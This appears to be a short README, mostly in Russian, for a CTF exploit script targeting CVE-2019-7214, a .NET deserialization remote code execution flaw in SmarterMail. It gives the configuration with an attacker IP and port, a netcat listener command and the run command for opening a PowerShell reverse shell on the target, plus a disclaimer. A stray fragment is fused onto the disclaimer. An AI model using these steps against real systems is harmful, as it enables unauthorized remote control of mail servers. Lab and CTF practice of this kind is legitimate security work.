
For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)
Этот Python-скрипт нацелен на уязвимую службу, работающую на удаленной машине Windows. Он отправляет сериализованную полезную нагрузку .NET, которая запускает реверс-шелл на основе PowerShell обратно на машину атакующего.
Удаленное выполнение кода при десериализации .NET в системе SmarterMail.
Обновите секцию конфигурации скрипта в соответствии с вашим окружением:
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
nc -lvnp 4444
python3 CVE-2019-7214 .py
В случае успеха вы получите приглашение PowerShell от цели на вашем слушателе.
System.Management.Automation.Этот скрипт предоставлен только в образовательных целях. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.